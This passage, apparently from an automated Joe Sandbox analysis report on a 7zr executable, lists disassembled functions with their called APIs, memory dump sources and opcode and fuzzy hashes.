                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: H_prologProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                              • String ID:
                              • API String ID: 1532160333-0
                              • Opcode ID: 83dd22542ed76898e4720160facb84efc1bf7c9f2280db66827b3dc4cf066311
                              • Instruction ID: 1eb02a3c1e6fd3d8cef7810eaf139b3f782ed3aa42860055725e482ba36f2b7d
                              • Opcode Fuzzy Hash: 83dd22542ed76898e4720160facb84efc1bf7c9f2280db66827b3dc4cf066311
                              • Instruction Fuzzy Hash: 4C2139B1846B90CFC361CF6A86D0686FFF4BB19600B94996ED0DA83B12C374B508CF55
                              Function 006F035F Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 006F0364
                                • Part of subcall function 006F01C4: __EH_prolog.LIBCMT ref: 006F01C9
                                • Part of subcall function 006F0143: __EH_prolog.LIBCMT ref: 006F0148
                                • Part of subcall function 006B1E40: free.MSVCRT ref: 006B1E44
                                • Part of subcall function 006F03D8: __EH_prolog.LIBCMT ref: 006F03DD
                                • Part of subcall function 006F004A: __EH_prolog.LIBCMT ref: 006F004F
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: H_prolog$free
                              • String ID:
                              • API String ID: 2654054672-0
                              • Opcode ID: d4016c569769dacceb7c4d641dd74a787e8272fa46d2f588099d3436bdecfbb7
                              • Instruction ID: 626e6c4e902d017fcffbf47dcf00257d104cf701f68abf568e328ebefb3d34c0
                              • Opcode Fuzzy Hash: d4016c569769dacceb7c4d641dd74a787e8272fa46d2f588099d3436bdecfbb7
                              • Instruction Fuzzy Hash: 42F02170904A54EADB09EBA8C4223EDBBE2AF01304F10466CE452622C2CBB86A048748
                              Function 006E8565 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 4f9efaf067742a519827546206523687b7d82a1638187617026c65a741b3870a
                              • Instruction ID: 2583d9c51794e4e4ec76a5b47fbae0543523b795a537b9093f2969bbdb26eccb
                              • Opcode Fuzzy Hash: 4f9efaf067742a519827546206523687b7d82a1638187617026c65a741b3870a
                              • Instruction Fuzzy Hash: E0F0AF72E0115AEFCB04DF99D8408EFBB76FF44790B00806AF419E7251DB348A05CBA4
                              Function 006B2201 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputs
                              • String ID:
                              • API String ID: 1795875747-0
                              • Opcode ID: fe164f351da1ce45375d72323aa2522e7b4c586a764b9af7b9fd4a52e81d0d5c
                              • Instruction ID: 2aed68cb1cc44e3066295d2a3c65b3bb33d0b9d6df7331e554f0da6fbb9c894a
                              • Opcode Fuzzy Hash: fe164f351da1ce45375d72323aa2522e7b4c586a764b9af7b9fd4a52e81d0d5c
                              • Instruction Fuzzy Hash: 43D0127250421DABCF156B94DC05CDD7BBDFF18214700441EF551E2160EAB5E5148794
                              Function 007080AA Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                              Download Yara Rule
                              APIs
                              • __EH_prolog.LIBCMT ref: 007080AF
                                • Part of subcall function 006B1E0C: malloc.MSVCRT ref: 006B1E1F
                                • Part of subcall function 006B1E0C: _CxxThrowException.MSVCRT(?,00764B28), ref: 006B1E39
                                • Part of subcall function 006FBDB5: __EH_prolog.LIBCMT ref: 006FBDBA
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: H_prolog$ExceptionThrowmalloc
                              • String ID:
                              • API String ID: 3744649731-0
                              • Opcode ID: a1524995d585e6df854ac365cc223c0ec8ea4bbefaca431f96a94ad42edc7e94
                              • Instruction ID: 85db14ffc49f7189a271cffb19c723c1096d9c179bb91cf8c692187b678ff959
                              • Opcode Fuzzy Hash: a1524995d585e6df854ac365cc223c0ec8ea4bbefaca431f96a94ad42edc7e94
                              • Instruction Fuzzy Hash: 3DD017B1A01605AECB88ABB494267AE72A2AB44340F00857EA416E6781EF7889008616
                              Function 006B2010 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: fputs
                              • String ID:
                              • API String ID: 1795875747-0
                              • Opcode ID: 5706428ad4357097cf38ca5ae5c1284849ba8afdd670d26ad09cef6037d08977
                              • Instruction ID: ed99d1aff338bc9e355d4f9639a412de6fbcbbc53153bea30162fa0119825ec4
                              • Opcode Fuzzy Hash: 5706428ad4357097cf38ca5ae5c1284849ba8afdd670d26ad09cef6037d08977
                              • Instruction Fuzzy Hash: ECD0C976008352AF96666F05EC09CCBBFA6FFD9321721082FF480921609B626865DBA5
                              Function 006BC4D6 Relevance: 1.5, APIs: 1, Instructions: 205COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000009.00000002.1801463258.00000000006B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006B0000, based on PE: true
                              • Associated: 00000009.00000002.1801445433.00000000006B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801520747.000000000075C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801543795.0000000000772000.00000004.00000001.01000000.0000000A.sdmpDownload File
                              • Associated: 00000009.00000002.1801561855.000000000077B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_6b0000_7zr.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID:
                              • API String ID: 2162964266-0
                              • Opcode ID: cd71f494001e3ba49f55210878b34960ff4776a22f930a78fc01007fb15c0724
                              • Instruction ID: 187a862a348d96bef253b6f2311b4acf28fb9a495d90e7df525390dfbc3d1d09
                              • Opcode Fuzzy Hash: cd71f494001e3ba49f55210878b34960ff4776a22f930a78fc01007fb15c0724
                              • Instruction Fuzzy Hash: 5F812CB1E042499FCF24CFA8C484AEEBBB2AF48324F14846AD511A7341D775AAC5CF64